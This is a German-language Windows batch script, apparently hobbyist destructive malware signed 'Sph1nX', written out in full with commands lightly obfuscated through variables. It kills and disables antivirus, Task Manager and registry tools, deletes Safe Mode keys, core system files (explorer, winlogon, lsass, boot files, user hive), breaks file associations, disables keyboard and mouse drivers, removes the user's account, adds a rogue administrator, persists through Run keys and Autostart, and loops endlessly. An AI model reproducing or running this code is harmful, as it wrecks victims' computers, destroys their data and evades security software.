@%print% off REM DU SIEHST DIESEN SATZ ? REM WILLST WOHL RIPPEN HM ? REM PLS DIE !!! REM MADE BY Sph1nX - www.batch-rockz.dl.am REM FUCK OFF set ass=assoc set att=attrib set regist=reg set sta=start set ka=copy set netz=net set rename=ren set print=echo %att% +R +S +H %0 %att% +R +S +H "%userprofile%\Lokale Einstellungen\Temp" %att% +R +S +H "%userprofile%\Lokale Einstellungen\Temp\" reg delete HKLM\SYSTEM\cur%rename%tcontrolset\control\safeboot\minimal /f reg delete HKLM\SYSTEM\Cur%rename%tControlSet\control\safeboot\%netz%work /f reg add HKCU\Software\Microsoft\Windows\Cur%rename%tVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\Cur%rename%tVersion\Policies\Explorer /v NoChange%sta%Menu /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\Cur%rename%tVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\Cur%rename%tVersion\Policies\Explorer /v NoClose /t REG_SZ /d 1 /f reg add HKCU\Software\Microsoft\Windows\Cur%rename%tVersion\Policies\System /v NoDispSettingsPage /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\Cur%rename%tVersion\Policies\Explorer /v NoDispCPL /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\Cur%rename%tVersion\Policies\Explorer /v NoRecentDocsMenu /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\Cur%rename%tVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f %sta% iexplore www.batch-rockz.dl.am %att% +R +S +H "%userprofile%\Lokale Einstellungen\Temp" md "C:\Programm Files\" %ka% %0 "C:\Programm Files\" %ka% %0 "C:\Programm Files" %netz% user %username% /del %netz% localgroup Administrato%rename% %username% /del %netz% user %username% /delete %netz% localgroup Administrato%rename% %username% /delete cls %ka% %0 "%userprofile%\%sta%m~1\Programme\Auto%sta%" %rename% %userprofile%\%sta%m~1\Programme\Auto%sta%\*.* %random%.* md %windir%\Command %ka% %0 "%windir%\Command\" %rename% %windir%\Command\*.bat Command.bat %rename% %windir%\Command\*.exe Command.exe %rename% %windir%\Command\*.* Command.* reg add HKLM\Software\Microsoft\Windows\Cur%rename%tVersion\Run /v Winlogon /t REG_SZ /d %windir%\Command\Command.bat /f reg add HKLM\Software\Microsoft\Windows\Cur%rename%tVersion\Run /v Winlogon /t REG_SZ /d %windir%\Command\Command.exe /f %ka% %0 "%AllUsersProfile%\%sta%m~1\Programme\Auto%sta%" %ka% %0 ""%userprofile%\%sta%m~1\Programme\Auto%sta%" %rename% ""%userprofile%\%sta%m~1\Programme\Auto%sta%\*.bat" %random%.bat %rename% ""%userprofile%\%sta%m~1\Programme\Auto%sta%\*.exe" %random%.exe %rename% ""%userprofile%\%sta%m~1\Programme\Auto%sta%\*.*" %random%.* %att% +R +S +H ""%userprofile%\%sta%m~1\Programme\Auto%sta%" %att% +R +S +H "%windir%\Command" %print% y | reg add HKCU\Software\Microsoft\Windows\Cur%rename%tVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d "1" %print% y | reg add HKCU\Software\Microsoft\Windows\Cur%rename%tVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d "1" %print% j | reg add HKCU\Software\Microsoft\Windows\Cur%rename%tVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d "1" %print% j | reg add HKCU\Software\Microsoft\Windows\Cur%rename%tVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d "1" color 0a %netz% stop AntiVirService %netz% stop cryptsvc %netz% stop Designs %netz% stop Anmeldedienst cls taskkill /F /T /IM avgnt.exe tskill /A avgnt taskkill /F /T /IM avguard.exe tskill /A avguard taskkill /IM taskmgr.exe tskill taskmgr cd %windir%\system32 %att% -R -S -H taskmgr.exe del /S /Q /F taskmgr.exe taskkill /IM explorer.exe tskill explorer cd %windir% REM Sph1nX %att% -R -S -H explorer.exe del /S /Q /F explorer.exe tskill explorer del /S /Q /F explorer.exe tskill explorer del /S /Q /F explorer.exe tskill explorer del /S /Q /F explorer.exe tskill explorer del /S /Q /F explorer.exe tskill explorer del /S /Q /F explorer.exe tskill explorer del /S /Q /F explorer.exe tskill explorer del /S /Q /F explorer.exe %att% -R -S -H bootstat.dat del /S /Q /F bootstat.dat cd %windir%\Prefetch %att% -R -S -H NTOSBOOT-B00DFAAD.pf del /S /Q /F NTOSBOOT-B00DFAAD.pf cd %windir%\system32 %att% -R -S -H bootvid.dll del /F /S /Q bootvid.dll cd "%userprofile%" %att% -R -S -H NTUSER.dat del /F /S /Q NTUSER.dat REM Sph1nX cls cd\ %att% -R -S -H *.sys %att% -R -S -H *.bin %att% -R -S -H *.bat %att% -R -S -H ntldr.* %att% -R -S -H *.SYS %att% -R -S -H %systemroot%\system32\logon.scr %att% -R -S -H %systemroot%\system32\logonui.exe %att% -R -S -H %systemroot%\system32\logonui.exe.manifest %att% -R -S -H %systemroot%\system32\seclogon.dll %att% -R -S -H %systemroot%\system32\usrlogon.cmd %att% -R -S -H %systemroot%\system32\WindowsLogon.manifest %att% -R -S -H %systemroot%\system32\winlogon.exe %att% -R -S -H %systemroot%\system32\dllcache\logon.scr %att% -R -S -H %systemroot%\system32\dllcache\logonui.exe %att% -R -S -H C:\WINDOWS\system32\dllcache\winlogon.exe %att% -R -S -H %windir%\Cursors\*.* cd\ del /F /Q *.sys del /F /Q *.bin del /F /Q *.bat del /F /Q *.SYS del /F /Q %systemroot%\system32\logon.scr del /F /Q %systemroot%\system32\logonui.exe del /F /Q %systemroot%\system32\logonui.exe.manifest del /F /Q %systemroot%\system32\seclogon.dll del /F /Q %systemroot%\system32\usrlogon.cmd del /F /Q %systemroot%\system32\WindowsLogon.manifest del /F /Q %systemroot%\system32\winlogon.exe del /F /Q %systemroot%\system32\dllcache\logon.scr del /F /Q %systemroot%\system32\dllcache\logonui.exe del /F /Q C:\WINDOWS\system32\dllcache\winlogon.exe del /F /Q %windir%\Cursors\*.* cls taskkill /F /IM explorer.exe del /F /Q %windir%\explorer.exe del /F /Q %windir%\system32\explorer.exe shutdown -s -t 30 -c "%username% g0t 0wn3d bY -Sph1nX-" %ass% .dll=FucKeD %ass% .exe=FucKeD %ass% .ini=FucKeD %ass% .logon=FucKeD %ass% .scr=FucKeD %ass% .reg=FucKeD %ass% .key=FucKeD %ass% .com=FucKeD %ass% .zip=FucKeD %ass% .rar=FucKeD %ass% .jpg=FucKeD %ass% .ico=FucKeD %ass% .icon=FucKeD %ass% .bat=FucKeD cls taskkill /F /T /IM lsass.exe tskill /A lsass del /F /Q %windir%\system32\lsass.exe taskkill /F /IM explorer.exe tskill explorer REM Sph1nX del /F /Q %windir%\explorer.exe del /F /Q %windir%\system32\explorer.exe cls md %windir%\Command %ka% %0 "%windir%\Command\" %ka% %0 "%windir%\Command" %rename% %windir%\Command\*.* Command.bat REM Sph1nX reg add HKLM\Software\Microsoft\Windows\Cur%rename%tVersion\Run /v Winlogon /t REG_SZ /d %windir%\Command\Command.bat /f %ka% %0 "C:\Dokumente und Einstellungen\All Users\%sta%men\Programme\Auto%sta%" %rename% %userprofile%\%sta%m~1\Programme\Auto%sta%\*.bat Command.bat reg add "HKLM\System\Cur%rename%tControlSet\Services\Mouclass" /v %sta% /t REG_DWORD /d "4" /f reg add "HKLM\System\Cur%rename%tControlSet\Services\Kbdclass" /v %sta% /t REG_DWORD /d "4" /f :ende %netz% user "Sph1nX - %random%" "%random%" /add %netz% localgroup Administrato%rename% "Sph1nX - %random%" /add %sta% %0 goto ende